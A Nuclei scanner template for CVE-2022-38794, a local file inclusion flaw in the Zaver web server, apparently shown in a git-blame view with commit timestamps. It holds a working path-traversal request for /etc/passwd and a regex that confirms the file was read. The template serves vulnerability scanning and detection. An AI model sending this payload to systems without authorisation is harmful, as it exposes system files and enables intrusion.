2022-08-28 20:35:50 +00:00
|
|
|
id: CVE-2022-38794
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Zaver - Local File Inclusion
|
|
|
|
author: pikpikcu
|
|
|
|
severity: high
|
|
|
|
description: |
|
2023-01-16 17:41:15 +00:00
|
|
|
Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring.
|
2022-08-28 20:35:50 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/zyearn/zaver/issues/22
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-38794
|
2022-09-12 12:46:04 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2022-38794
|
|
|
|
cwe-id: CWE-22
|
2022-08-28 20:35:50 +00:00
|
|
|
tags: cve,cve2022,lfi,zaver
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/../../../../../../../../etc/passwd'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
2022-09-12 11:26:51 +00:00
|
|
|
part: body
|
2022-08-28 20:35:50 +00:00
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-01-16 17:41:15 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2023/01/15
|